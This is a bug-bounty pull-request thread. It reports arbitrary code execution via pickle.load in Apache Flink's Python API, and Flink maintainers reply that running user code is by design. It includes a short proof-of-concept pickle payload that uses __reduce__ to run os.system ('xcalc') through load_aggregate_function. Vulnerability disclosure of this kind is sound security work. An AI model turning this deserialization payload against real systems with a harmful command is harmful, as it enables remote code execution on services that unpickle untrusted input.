Fixed Arbitrary Code Execution by pickle.load

[B3EF]

📊 Metadata *

Fix for Arbitrary Code Execution

Bounty URL:https://www.huntr.dev/bounties/1-pip-apache-flink

⚙️ Description *

Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.

💻 Technical Description *

Vulnerability description untrusted loading of data by the pickle.load function leading to Arbitrary code execution.

🐛 Proof of Concept (POC) *

run the exploit below

import os
import pickle
#os.system('pip3 install apache-flink')
from pyflink.fn_execution import operation_utils
#payload formation
class ArbitraryCode:
    def __reduce__(self):
        cmd = ('xcalc')
        return os.system, (cmd,)
dumps = pickle.dumps(ArbitraryCode())
operation_utils.load_aggregate_function(dumps)

🔥 Proof of Fix (PoF) *

👍 User Acceptance Testing (UAT)

The library has been successfully tested

[huntr-helper]

👋 Hello, @tillrohrmann - @B3EF has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@tillrohrmann & @B3EF - thank you for your efforts in securing the world’s open source code! 🎉

[tillrohrmann]

Thanks for creating this fix @B3EF.

I am not entirely sure whether this is really an exploit because Flink is designed to execute arbitrary code in parallel fashion. Hence, it is a bit the responsibility of the user to make sure that his code does the right things. For example, using the Java API you can also call System.exit().

Moreover, we need to be able to execute code from arbitrary Python libraries whose module names we don't know upfront.

I am also pulling in @dianfu who works on Flink's Python API for a second opinion.

Feel free to disagree.

[dianfu]

Thanks a lot for the fix @B3EF and thanks @tillrohrmann for the ping. I agree with @tillrohrmann and also tend to think this is by design and should not be a problem.

Flink allows users to execute arbitrary code. Users could define user-defined functions in Java/Scala/Python languages in Flink, see [1] and [2] for more details. There are no limitations on what users could do in the user-defined functions and this is the same case for all kinds of user-defined functions in Flink (I think this is also the behavior shared by most projects, such as Spark, Beam, etc).